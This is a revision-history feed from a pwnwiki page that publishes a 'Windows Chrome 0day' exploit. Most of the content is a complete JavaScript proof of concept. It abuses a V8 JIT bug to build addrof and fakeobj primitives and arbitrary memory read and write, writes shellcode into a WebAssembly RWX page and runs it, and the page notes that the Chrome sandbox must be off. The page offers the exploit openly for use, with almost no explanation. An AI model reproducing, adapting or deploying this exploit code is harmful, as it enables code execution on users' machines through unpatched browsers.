https://pwnwiki.com/index.php?action=history&feed=atom&title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9E%2Fen
Windows Chrome 0day漏洞/en - Revision history
2026-04-05T07:01:27Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9E/en&diff=1599&oldid=prev
Pwnwiki: Created page with "Windows Chrome 0day vulnerability"
2021-04-13T02:24:31Z
<p>Created page with "Windows Chrome 0day vulnerability"</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 02:24, 13 April 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l116" >Line 116:</td>
<td colspan="2" class="diff-lineno">Line 116:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>To use this vulnerability, you need to close the sandbox environment. If you don’t close the sandbox, it will prompt <code>status_access_violation</code> or a memory error.</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>To use this vulnerability, you need to close the sandbox environment. If you don’t close the sandbox, it will prompt <code>status_access_violation</code> or a memory error.</div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang="zh-Hant" dir="ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">Close the sandbox to pop up the calculator</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">關閉沙箱可以彈出計算器</del></div></td><td colspan="2"> </td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td colspan="2"> </td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-1597:rev-1599 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=Windows_Chrome_0day%E6%BC%8F%E6%B4%9E/en&diff=1597&oldid=prev
Pwnwiki: Created page with "Only supports Windows Chrome"
2021-04-13T02:24:26Z
<p>Created page with "Only supports Windows Chrome"</p>
<p><b>New page</b></p><div><languages /><br />
==Prerequisites==<br />
Only supports Windows Chrome<br />
<br />
==EXP==<br />
<br />
===exploit.html===<br />
<pre><br />
<script src="exploit.js"></script><br />
</pre><br />
<br />
===exploit.js===<br />
<pre><br />
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])<br />
var wasm_mod = new WebAssembly.Module(wasm_code);<br />
var wasm_instance = new WebAssembly.Instance(wasm_mod);<br />
var f = wasm_instance.exports.main;<br />
<br />
var buf = new ArrayBuffer(8);<br />
var f64_buf = new Float64Array(buf);<br />
var u64_buf = new Uint32Array(buf);<br />
let buf2 = new ArrayBuffer(0x150);<br />
<br />
function ftoi(val) {<br />
f64_buf[0] = val;<br />
return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);<br />
}<br />
<br />
function itof(val) {<br />
u64_buf[0] = Number(val & 0xffffffffn);<br />
u64_buf[1] = Number(val >> 32n);<br />
return f64_buf[0];<br />
}<br />
<br />
const _arr = new Uint32Array([2**31]);<br />
<br />
function foo(a) {<br />
var x = 1;<br />
x = (_arr[0] ^ 0) + 1;<br />
<br />
x = Math.abs(x);<br />
x -= 2147483647;<br />
x = Math.max(x, 0);<br />
<br />
x -= 1;<br />
if(x==-1) x = 0;<br />
<br />
var arr = new Array(x);<br />
arr.shift();<br />
var cor = [1.1, 1.2, 1.3];<br />
<br />
return [arr, cor];<br />
}<br />
<br />
for(var i=0;i<0x3000;++i)<br />
foo(true);<br />
<br />
var x = foo(false);<br />
var arr = x[0];<br />
var cor = x[1];<br />
<br />
const idx = 6;<br />
arr[idx+10] = 0x4242;<br />
<br />
function addrof(k) {<br />
arr[idx+1] = k;<br />
return ftoi(cor[0]) & 0xffffffffn;<br />
}<br />
<br />
function fakeobj(k) {<br />
cor[0] = itof(k);<br />
return arr[idx+1];<br />
}<br />
<br />
var float_array_map = ftoi(cor[3]);<br />
<br />
var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];<br />
var fake = fakeobj(addrof(arr2) + 0x20n);<br />
<br />
function arbread(addr) {<br />
if (addr % 2n == 0) {<br />
addr += 1n;<br />
}<br />
arr2[1] = itof((2n << 32n) + addr - 8n);<br />
return (fake[0]);<br />
}<br />
<br />
function arbwrite(addr, val) {<br />
if (addr % 2n == 0) {<br />
addr += 1n;<br />
}<br />
arr2[1] = itof((2n << 32n) + addr - 8n);<br />
fake[0] = itof(BigInt(val));<br />
}<br />
<br />
function copy_shellcode(addr, shellcode) {<br />
let dataview = new DataView(buf2);<br />
let buf_addr = addrof(buf2);<br />
let backing_store_addr = buf_addr + 0x14n;<br />
arbwrite(backing_store_addr, addr);<br />
<br />
for (let i = 0; i < shellcode.length; i++) {<br />
dataview.setUint32(4*i, shellcode[i], true);<br />
}<br />
}<br />
<br />
var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));<br />
console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));<br />
var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];<br />
copy_shellcode(rwx_page_addr, shellcode);<br />
f();<br />
</pre><br />
<br />
==Warning==<br />
<br />
To use this vulnerability, you need to close the sandbox environment. If you don’t close the sandbox, it will prompt <code>status_access_violation</code> or a memory error.<br />
<br />
<div lang="zh-Hant" dir="ltr" class="mw-content-ltr"><br />
關閉沙箱可以彈出計算器<br />
</div></div>
Pwnwiki